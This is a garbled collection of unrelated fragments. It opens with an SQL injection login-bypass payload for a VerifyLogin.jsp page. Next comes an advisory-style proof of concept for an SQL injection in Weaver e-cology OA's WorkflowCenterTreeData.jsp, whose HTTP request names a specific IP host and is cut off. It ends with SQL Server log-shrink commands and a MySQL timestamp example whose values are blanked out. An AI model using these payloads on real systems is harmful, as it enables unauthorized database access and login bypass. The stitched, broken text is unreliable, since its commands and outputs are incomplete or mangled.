SQL injection: front-end SQL injection. Username: admin' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a Password: 1 Verification page parameter - loginid (1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&a
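0x00 Overview: This vulnerability exists because the OA system's WorkflowCenterTreeData interface does not apply security filtering to the user input it receives, so malicious SQL statements are passed to the Oracle database, resulting in a SQL vulnerability. 0x01 Affected scope: Weaver (泛微) e-cology OA systems that use an Oracle database. poc POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1 Host:122.224.179.98:443 User-Agent: M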
-- Shrink the database log file
USE [master]
ALTER DATABASE yourdatabasename SET RECOVERY SIMPLE WITH NO_WAIT
ALTER DATABASE yourdatabasename SET RECOVERY SIMPLE
USE yourdatabasename
DBCC SHRINKFILE (N'yourdatabasename _Log' , 0,TRUNCATEONLY) -- database log file name (right-click the database > Properties > logical log file name)
Automatically updating the modification time: mysql> create table z(a int ,b timestamp on update current_timestamp); mysql> insert into z ,current_timestamp; mysql> select * from z; +------+---------------------+ | a | b | +------+---------------------+ | | -- :: | +------+--------